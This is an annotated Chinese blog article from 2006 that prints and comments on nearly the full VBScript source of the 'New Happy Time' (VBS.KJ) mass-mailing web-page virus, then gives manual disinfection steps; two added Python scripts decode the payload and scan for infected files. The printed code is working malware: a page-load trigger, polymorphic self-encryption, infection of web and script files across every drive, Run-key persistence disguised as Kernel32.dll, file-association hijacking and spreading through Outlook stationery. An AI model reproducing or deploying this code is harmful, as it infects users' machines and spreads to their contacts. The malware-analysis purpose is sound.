
"New Happy Time" (新快乐时光), dissected again

王朝vc · Author: anonymous  2006-01-08

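' VBS.KJ "New Happy Time", a web-page macro virus

' Today I was infected by this virus yet again, and the annoying error dialog popped up once more. It would be one thing if it had kept me from noticing, but writing code this bad is just disgusting.

' In a fit of anger I dissected it and got a clear look. The virus's encryption is fairly interesting; the clumsiest part is that an error prompt appears when it executes.

' My VB skills are low-level (I lean toward C) and I can just about write a HELLO WORLD, so the analysis below may contain many mistakes;

' please bear with me.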

<BODY onload="vbscript:KJ_start()"> ' the virus code starts executing here

<!--

* This file was automatically generated by Microsoft Internet Explorer 4.0

* using the file %THISDIRPATH%\folder.htt (if customized) or

* %TEMPLATEDIR%\folder.htt (if not customized).

-->

<html>

<body scroll=no onload="Init()">

......

</body>

</html>

.......

<script language=vbscript> ' the next statement is also part of the virus

document.Write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><" & "APPLET NAME=KJ" & "_guest HEIGHT=0 WIDTH=0 code=com.ms." & "activeX.Active" & "XComponent></APPLET></div>"

</script>

<script language=vbscript> ' the virus body is hidden at the end of the FOLDER.HTT file, and it is encrypted; I like that

ExeString = "......"

Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))"&vbCrLf&"If TempNum = 18 Then"&vbCrLf&"TempNum = 34"&vbCrLf&"End If"&vbCrLf&"TempChar = Chr(TempNum + KeyArr(i Mod 4))"&vbCrLf&"If TempChar = Chr(28) Then"&vbCrLf&"TempChar = vbCr"&vbCrLf&"ElseIf TempChar = Chr(29) Then"&vbCrLf&"TempChar = vbLf"&vbCrLf&"End If"&vbCrLf&"ThisText = ThisText & TempChar"&vbCrLf&"Next")

Execute (ThisText) ' execute the code!

</script>

</BODY>

</HTML>

' end of the virus
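' Added example, not part of the original article or of the virus code: a Python sketch that decodes an ExeString blob statically, so the payload can be read without ever calling Execute. It takes the key from the KeyArr(...) assignments in the stub above; the sample stub and ciphertext are constructed, and the names extract_key, kj_decode and find_markers are assumptions of this example.

```python
import re

# Constructed stand-in for the Execute(...) stub shown above (same shape, key 7,7,3,8).
SAMPLE_STUB = ('Execute("Dim KeyArr(3),ThisText"&vbCrLf&"KeyArr(0) = 7"&vbCrLf&'
               '"KeyArr(1) = 7"&vbCrLf&"KeyArr(2) = 3"&vbCrLf&"KeyArr(3) = 8"&vbCrLf&'
               '"For i=1 To Len(ExeString)"&vbCrLf&"TempNum = Asc(Mid(ExeString,i,1))")')

# Constructed ciphertext: the text 'KJ_start()\r\nf(1)' encoded under that key.
# \x12 is Chr(18), the stand-in the encoder uses for a double quote.
SAMPLE_EXESTRING = "DGWlm^jm!&\x14\x16_%)\x12"

# Strings the article shows inside the virus; used to confirm a decode worked.
MARKERS = ("KJ_start()", "KJ_guest", "kjwall.gif")

KEY_RE = re.compile(r"KeyArr\((\d)\)\s*=\s*(\d+)")


def extract_key(stub):
    """Read the four per-copy key values out of the unlock stub."""
    found = {int(idx): int(val) for idx, val in KEY_RE.findall(stub)}
    if sorted(found) != [0, 1, 2, 3]:
        raise ValueError("stub does not assign KeyArr(0)..KeyArr(3)")
    return [found[i] for i in range(4)]


def kj_decode(exe_string, key):
    """Mirror of the stub's loop. Assumes single-byte characters."""
    out = []
    for i, ch in enumerate(exe_string, start=1):  # Mid() is 1-based
        num = ord(ch)
        if num == 18:              # Chr(18) stands in for Chr(34)
            num = 34
        num += key[i % 4]          # KeyArr(i Mod 4)
        if num == 28:              # Chr(28) encodes CR
            out.append("\r")
        elif num == 29:            # Chr(29) encodes LF
            out.append("\n")
        else:
            out.append(chr(num))
    return "".join(out)


def find_markers(text):
    """Return the known virus strings present in decoded text."""
    return [m for m in MARKERS if m in text]


if __name__ == "__main__":
    key = extract_key(SAMPLE_STUB)
    plain = kj_decode(SAMPLE_EXESTRING, key)
    print(key, repr(plain), find_markers(plain))
```

' Because every copy is re-encoded with a fresh random key, the ciphertext is useless as a signature; the stub's fixed text and the KJ_start() marker are what stay constant.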

Dim InWhere, HtmlText, VbsText, DegreeSign, AppleObject, FSO, WsShell, WinPath, SubE, FinalyDisk

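' Some variables are defined; each is explained here

' InWhere: determines whether the program is executing in HTML or has already entered the virus code part

' HtmlText needs little explanation: it is the content of the HTML file

' VbsText: the VBS script text the virus needs

' DegreeSign

' AppleObject

' FSO: all too familiar, the object scripts use to handle the file system

' WsShell: runs WINDOWS programs

' WinPath: holds the WINDOWS system path

' SubE

' FinalyDisk: which drive is the last hard disk; how nasty, does it want to take them all??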

Sub KJ_start() ' here it starts; the overall structure is fairly clear

KJSetDim() ' set up the variables

KJCreateMilieu()'

KJLikeIt()

KJCreateMail()

KJPropagate()

End Sub

Function KJAppendTo(FilePath, TypeStr)

' Checks the target file (really FOLDER.HTT); if it has not been infected, the virus body is appended

On Error Resume Next

Set ReadTemp = FSO.OpenTextFile(FilePath, 1) ' open the file for reading

TmpStr = ReadTemp.ReadAll

If InStr(TmpStr, "KJ_start()") <> 0 Or Len(TmpStr) < 1 Then

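ReadTemp.Close ' a file that lacks the string "KJ_start()" has not been infected; this branch skips files that already contain it

Exit Function ' empty files are not processed

End If ' from here on, the file meets the infection conditions

If TypeStr = "htt" Then ' if it is an HTT file; every directory has one, and you can see it by showing hidden files

ReadTemp.Close ' the file was opened for reading; to write, it has to be closed and reopened for writing (my guess ^_^)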

Set FileTemp = FSO.OpenTextFile(FilePath, 2)

FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText

FileTemp.Close ' writes "<BODY onload="vbscript:KJ_start()">" as the first line of the HTT file; I also annotated this at the start of the article

Set FAttrib = FSO.GetFile(FilePath)

FAttrib.Attributes = 34 ' change the file attributes: hidden

Else

ReadTemp.Close

Set FileTemp = FSO.OpenTextFile(FilePath, 8)

If TypeStr = "html" Then ' for an HTML file, <BODY onload="vbscript:KJ_start()"> must be written between <HTML></HTML> for it to execute

FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText

ElseIf TypeStr = "vbs" Then

FileTemp.Write vbCrLf & VbsText

End If

FileTemp.Close

End If

End Function

Function KJChangeSub(CurrentString, LastIndexChar)

' Switch directory

If LastIndexChar = 0 Then

If Left(LCase(CurrentString), 1) <= LCase("c") Then ' if it is the first hard disk, jump to the last hard disk

KJChangeSub = FinalyDisk & ":\"

SubE = 0 ' it seems to work in a cycle

Else ' for the other disks, the drive letter minus one (e.g. 'D'-1 = C)

KJChangeSub = Chr(Asc(Left(LCase(CurrentString), 1)) - 1) & ":\"

SubE = 0

End If

Else

KJChangeSub = Mid(CurrentString, 1, LastIndexChar)

End If

End Function

Function KJCreateMail()

' Sends EMAIL through OUTLOOK to the addresses in the address book.

On Error Resume Next

If InWhere = "html" Then

Exit Function ' when running inside HTML, this step is skipped

End If ' first infect the BLANK.HTML file; this file is loaded when the IE setting is the default "use blank page"

ShareFile = Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"

If (FSO.FileExists(ShareFile)) Then ' if it exists, infect it directly

Call KJAppendTo(ShareFile, "html")

Else ' if it does not exist, forge a BLANK.HTM file carrying the virus

Set FileTemp = FSO.OpenTextFile(ShareFile, 2, True)

FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText

FileTemp.Close

End If

DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")

OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")

WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"

Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)

Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)

WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference", 131072, "REG_DWORD"

Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")

Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360", "blank")

WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"

Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")

KJummageFolder (Left(WinPath, 3) & "Program Files\Common Files\Microsoft Shared\Stationery")

End Function

Function KJCreateMilieu()

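' Checks whether the script interpreter is installed on the system; if not, uses the system files Kernel, Kernel32 to perform the operations

' This fully exposes the fragility of WINDOWS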

On Error Resume Next

TempPath = ""

If Not (FSO.FileExists(WinPath & "WScript.exe")) Then

TempPath = "system32\"

End If

If TempPath = "system32\" Then

StartUpFile = WinPath & "SYSTEM\Kernel32.dll"

Else

StartUpFile = WinPath & "SYSTEM\Kernel.dll"

End If

WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32", StartUpFile

FSO.CopyFile WinPath & "web\kjwall.gif", WinPath & "web\Folder.htt"

FSO.CopyFile WinPath & "system32\kjwall.gif", WinPath & "system32\desktop..ini"

Call KJAppendTo(WinPath & "web\Folder.htt", "htt")

WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\", "dllfile"

WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type", "application/x-msdownload"

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\", WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\", "VBScript"

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\", WinPath & TempPath & "WScript.exe ""%1"" %*"

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\", "{60254CA5-953B-11CF-8C96-00AA00B8708C}"

WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\", "{85131631-480C-11D2-B1F9-00C04F86C324}"

Set FileTemp = FSO.OpenTextFile(StartUpFile, 2, True)

FileTemp.Write VbsText ' here the virus is written into both Kernel.dll and Kernel32.dll

FileTemp.Close

End Function

Function KJLikeIt()

If InWhere <> "html" Then

Exit Function

End If ' parse the path of the current file

ThisLocation = document.location

If Left(ThisLocation, 4) = "file" Then

ThisLocation = Mid(ThisLocation, 9)

If FSO.GetExtensionName(ThisLocation) <> "" Then

ThisLocation = Left(ThisLocation, Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))

End If

If Len(ThisLocation) > 3 Then

ThisLocation = ThisLocation & "\"

End If

KJummageFolder (ThisLocation)

End If

End Function

Function KJMailReg(RegStr, FileName)

On Error Resume Next

RegTempStr = WsShell.RegRead(RegStr)

If RegTempStr = "" Then

WsShell.RegWrite RegStr, FileName

End If

End Function

Function KJOboSub(CurrentString)

' Work out how deeply the current path is nested

SubE = 0

TestOut = 0

Do While True

TestOut = TestOut + 1

If TestOut > 28 Then ' if the depth exceeds 28, return to the root directory of the last hard disk

CurrentString = FinalyDisk & ":\"

Exit Do

End If

On Error Resume Next

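Set ThisFolder = FSO.GetFolder(CurrentString) ' the current directory string

Set DicSub = CreateObject("Scripting.Dictionary") ' build a dictionary holding the directories and depth

Set Folders = ThisFolder.SubFolders ' get the subdirectories

FolderCount = 0 ' initialize the subdirectory count to zero

For Each TempFolder In Folders ' count the subdirectories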

FolderCount = FolderCount + 1

DicSub.Add FolderCount, TempFolder.Name

Next

If DicSub.Count = 0 Then ' if there are no subdirectories

LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1) ' find the last '\' in the path

SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1) ' the deepest subdirectory

CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' switch to the parent directory

SubE = 1

Else

If SubE = 0 Then

CurrentString = CurrentString & DicSub.Item(1) & "\" ' walk the subdirectories stored in the dictionary

Exit Do

Else

j = 0

For j = 1 To FolderCount

If LCase(SubString) = LCase(DicSub.Item(j)) Then

If j < FolderCount Then ' go into the subdirectory

CurrentString = CurrentString & DicSub.Item(j + 1) & "\"

Exit Do

End If

End If

Next

LastIndexChar = InStrRev(CurrentString, "\", Len(CurrentString) - 1)

SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar - 1)

CurrentString = KJChangeSub(CurrentString, LastIndexChar) ' switch to the upper-level directory

End If

End If

Loop

KJOboSub = CurrentString

End Function

Function KJPropagate()

On Error Resume Next

RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"

DiskDegree = WsShell.RegRead(RegPathValue)

If DiskDegree = "" Then

DiskDegree = FinalyDisk & ":\"

End If

For i = 1 To 5 ' infect the files in directories at each level

DiskDegree = KJOboSub(DiskDegree)

KJummageFolder (DiskDegree)

Next

WsShell.RegWrite RegPathValue, DiskDegree ' write the registry, recording the deepest directory

End Function

Function KJummageFolder(PathName)

On Error Resume Next

Set FolderName = FSO.GetFolder(PathName)

Set ThisFiles = FolderName.Files

HttExists = 0

For Each ThisFile In ThisFiles

FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))

If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then

Call KJAppendTo(ThisFile.Path, "html") ' infect all HTM, HTML, ASP, PHP, JSP files in the current directory

Else

If FileExt = "VBS" Then ' infect VBS files; this kind of infection is easier

Call KJAppendTo(ThisFile.Path, "vbs")

Else If FileExt = "HTT" Then ' if an HTT file exists

HttExists = 1

End If

Next

If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop")) Then

HttExists = 1 ' neither the desktop nor a directory on the desktop is spared

End If

If HttExists = 0 Then ' if no HTT file exists, forge one; it is actually a matched pair of 2 files

FSO.CopyFile WinPath & "system32\desktop.ini", PathName

FSO.CopyFile WinPath & "web\Folder.htt", PathName

End If

End Function

Function KJSetDim()

On Error Resume Next

Err.Clear

TestIt = WScript.ScriptFullname ' get the full name of the script file

If Err Then

InWhere = "html" ' it is an HTML file

Else

InWhere = "vbs" ' it is a VBS file

End If

If InWhere = "vbs" Then ' if SCRIPT HOST is installed, things are much easier

Set FSO = CreateObject("Scripting.FileSystemObject")

Set WsShell = CreateObject("WScript.Shell")

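Else ' if SCRIPT HOST was not selected at install time, the virus configures it itself; it seems WINDOWS did not do what the user asked

Set AppleObject = document.applets("KJ_guest") ' register a script interpreter with the system through KJ_guest

AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") 'Windows Scripting Host Shell Object

AppleObject.createInstance() ' use SCRIPT HOST to perform the operations; this is why everyone is advised not to install SCRIPT HOST when installing 98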

Set WsShell = AppleObject.GetObject()

AppleObject.setCLSID ("{0D43FE01-F093-11CF-8940-00A0C9054228}") ' the powerful FileSystem Object

AppleObject.createInstance()

Set FSO = AppleObject.GetObject()

End If

Set DiskObject = FSO.Drives ' get the system's hard disk and floppy drives

For Each DiskTemp In DiskObject

If DiskTemp.DriveType <> 2 And DiskTemp.DriveType <> 1 Then

Exit For ' if it is not a hard disk or floppy disk, it cannot be infected

End If

FinalyDisk = DiskTemp.DriveLetter ' the last hard-disk drive letter in the system

Next

Dim OtherArr(3) ' a random array

Randomize

For i = 0 To 3

OtherArr(i) = Int((9 * Rnd)) ' from 0 to 9

Next

TempString = ""

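For i = 1 To Len(ThisText) ' from 1 to the length of the virus body; what follows appears to be the decryption part of the virus

TempNum = Asc(Mid(ThisText, i, 1)) ' take the ASC value of the character at position I

If TempNum = 13 Then ' if it is 13

TempNum = 28 ' force-replace it with 28

ElseIf TempNum = 10 Then ' if it is 10

TempNum = 29 ' force-replace it with 29

End If

TempChar = Chr(TempNum - OtherArr(i Mod 4)) ' ASC code of the character at I, minus the key entry indexed by I Mod 4

If TempChar = Chr(34) Then ' if it equals 34, replace it with 18

TempChar = Chr(18)

End If

TempString = TempString & TempChar ' the disguised virus code string has now been generated, fully at random

Next ' the next statement is rather tedious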

UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)" ThisText = "ExeString = """ & TempString & """" HtmlText ="<" & "script language=vbscript>" & vbCrLf & "document..write " & """" & "<" & "div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>" & "<""&""" & "APPLET NAME=KJ""&""_guest HEIGHT=0 WIDTH=0 code=com.ms.""&""activeX.Active""&""XCom _

nent>" & "<" & "/APPLET>" & "<" & "/div>""" & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "script language=vbscript>" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "<" & "/script>" & vbCrLf & "<" & "/BODY>" & vbCrLf & "<" & "/HTML>" VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"

'UnLockStr is the string that executes the virus; below is what actually runs

'

'Dim KeyArr(3),ThisText

'KeyArr(0) = OtherArr(0)

'KeyArr(1) = OtherArr(1)

'KeyArr(2) = OtherArr(2)

'KeyArr(3) = OtherArr(3)

'For i=1 To Len(ExeString)

' TempNum = Asc(Mid(ExeString,i,1))

' If TempNum = 18 Then

' TempNum = 34

' End If

' TempChar = Chr(TempNum + KeyArr(i Mod 4))

' If TempChar = Chr(28) Then

' TempChar = vbCr

' ElseIf TempChar = Chr(29) Then

' TempChar = vbLf

' End If

' ThisText = ThisText & TempChar

'Next      after the above runs, a ThisText command string has been built

' "Execute(ThisText) " is a string that can be found in the web page

' ThisText = "ExeString = <content of TempString>"; this is where THISTEXT is assigned

' HtmlText =

' <script language=vbscript>

' <div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'>

' <APPLET NAME=KJ_guest HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent>

' </APPLET>

' </div>

' </script>

' <script language=vbscript>

' ThisText      the part that can be found in the web page, i.e. "ExeString=..."

' UnLockStr Execute("Dim KeyArr(3)...."

' </script>

' </BODY>

' </HTML>

'VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"

WinPath = FSO.GetSpecialFolder(0) & "\"

If (FSO.FileExists(WinPath & "web\Folder.htt")) Then ' deeper infection

FSO.CopyFile WinPath & "web\Folder.htt", WinPath & "web\kjwall.gif"

End If ' if this machine is a WEB server, every user who has browsed this server will be infected

If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then

FSO.CopyFile WinPath & "system32\desktop.ini", WinPath & "system32\kjwall.gif"

End If

End Function

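' With the analysis above, disinfection becomes much easier

' Disinfection

' 1. For HTT files

' The first line is the start of the virus and should be deleted: the first 0X24 BYTES should be deleted

' Counting back from the end of the file, (0X5A0A-0X2D3C+1=)0X2CCF BYTES should be deleted

' 2. For HTML, ASP, PHP, JSP files

' Counting back from the end of the file, (0X5E4E-0X3153+1=)0X2CFC should be deleted

' 3. For VBS files

' Simply delete the last 0X2B97+2 (carriage return) BYTES of the file

' 4. As for KERNEL.DLL, it can be deleted outright; to be safe, you can also delete the last 0X2B97 BYTES of the file

' 5. And kjwall.gif: delete it outright.

' 6. Restore the registry entries that were modified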

' WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"

' Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)

' Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)

' WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"

' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")

' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360","blank")

' WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"

' Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")

' WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile

' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")

' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"

' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"

' WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"

' RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"

' ****************************************************************

' HKEY_CURRENT_USER\Identities\Default User ID    if there is SOFTWARE\ and so on, delete the trailing SOFTWARE and keep the rest

' HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference    just clear the value

' HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360    clear

' HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings\0a0d020000000000c000000000000046\001e0360    clear

' HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference    clear

' HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery    clear

' HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32    clear

' HKEY_CLASSES_ROOT\.dll    delete .DLL and everything under it

' HKEY_CLASSES_ROOT\dllfile\DefaultIcon\    delete DLLFILE and everything under it

' HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command

' HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps

' HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode

' HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree    delete DEGREE and everything under it
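
' Added example, not part of the original article: a read-only Python scanner that lists the files the disinfection steps above apply to. It reuses the virus's own "already infected" test (the KJ_start() string checked in KJAppendTo), the extension list from KJummageFolder, and the file names Kernel.dll, Kernel32.dll and kjwall.gif; the function names and the sample tree built in demo() are constructed for this example.

```python
import os
import tempfile

MARKER = b"KJ_start()"                       # string KJAppendTo looks for
INFECTABLE_EXT = {"htm", "html", "asp", "php", "jsp", "vbs", "htt"}
STARTUP_NAMES = {"kernel.dll", "kernel32.dll"}  # VbsText is written into these
DROPPED_NAMES = {"kjwall.gif"}               # copies made by KJSetDim


def classify(path):
    """Return why a file needs attention, or None if it looks clean."""
    name = os.path.basename(path).lower()
    if name in DROPPED_NAMES:
        return "dropped-copy"
    ext = name.rpartition(".")[2] if "." in name else ""
    if ext in INFECTABLE_EXT or name in STARTUP_NAMES:
        with open(path, "rb") as fh:
            if MARKER in fh.read():
                return "infection-marker"
    return None


def scan_tree(root):
    """Walk root and return sorted (relative path, reason) pairs."""
    hits = []
    for folder, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(folder, fname)
            try:
                reason = classify(full)
            except OSError:
                continue  # unreadable file: skip, nothing is modified
            if reason:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                hits.append((rel, reason))
    return sorted(hits)


def demo():
    """Build a small constructed tree and scan it."""
    samples = {
        "index.html": b"<html><body>clean page</body></html>",
        "about.htm": b"<html></html>\r\n<HTML>\r\n"
                     b"<BODY onload=\"vbscript:KJ_start()\">\r\n",
        "job.vbs": b"WScript.Echo 1\r\nExeString = \"......\"\r\nKJ_start()",
        "notes.txt": b"an article that mentions KJ_start() in prose",
        "web/kjwall.gif": b"placeholder",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in samples.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(reason, rel)
```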

 
 
 